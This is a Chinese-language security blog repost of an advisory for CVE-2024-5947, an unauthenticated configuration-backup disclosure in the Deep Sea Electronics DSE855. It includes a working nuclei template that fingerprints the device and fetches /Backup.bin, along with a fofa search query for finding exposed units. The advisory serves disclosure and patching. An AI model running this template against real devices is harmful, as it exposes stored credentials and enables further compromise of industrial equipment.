Deep Sea Electronics DSE855身份认证绕过漏洞 Poc

admin 2024年7月14日19:00:21评论42 views字数 2010阅读6分42秒阅读模式
0x00 漏洞编号
  • CVE-2024-5947

0x01 危险等级
  • 中危
0x02 漏洞概述

DSE855是一款将DSE控制器的USB端口转换为以夜网端口的设备,内置网络服务器,支持通过内部网络和互联网进行使用。

Deep Sea Electronics DSE855身份认证绕过漏洞 Poc

0x03 漏洞详情
CVE-2024-5947
漏洞类型:身份验证绕过
影响:获取敏感信息
简述:Deep Sea Electronics DSE855配置备份存在身份验证信息泄露漏洞,未经身份验证的攻击者可通过该漏洞获取设备安装的敏感信息
0x04 影响版本
  • DSE855

0x05 POC

id: CVE-2024-5947

info:
  name: Deep Sea Electronics DSE855 - Authentication Bypass
  author: securityforeveryone
  severity: medium
  description: |
    Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5947
    - https://packetstormsecurity.com/files/179342/Deep-Sea-Electronics-DSE855-Remote-Authentication-Bypass.html
    - https://www.zerodayinitiative.com/advisories/ZDI-24-671/
  metadata:
    verified: "true"
    max-request: 1
    vendor: Deep Sea Electronics
    product: DSE855
    fofa-query: "Deep Sea Electronics"
  tags: packetstorm,cve,cve2024,bypass,info-leak

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Copyright Deep Sea Electronics")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /Backup.bin HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"Unknown")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100f14e5dff551bad0f216e8edc91cfd4c2cadc7d37baf36247886eece90dd58c1e0221009673d4928258a44eac8cece1dcd71fbec2bc2fe77f56e0f46b6f8b2aac07ac0d:922c64590222798bb761d5b6d8e72950
https://github.com/projectdiscovery/nuclei-templates/blob/24f32b832faee876572ec212ef327f60c891068a/http/cves/2024/CVE-2024-5947.yaml

0x06 修复建议

目前官方已发布漏洞修复版本,建议用户升级到安全版本
https://www.deepseaelectronics.com/

原文始发于微信公众号(浅安安全):漏洞预警 | Deep Sea Electronics DSE855身份认证绕过漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月14日19:00:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Deep Sea Electronics DSE855身份认证绕过漏洞 Pochttps://cn-sec.com/archives/2949840.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息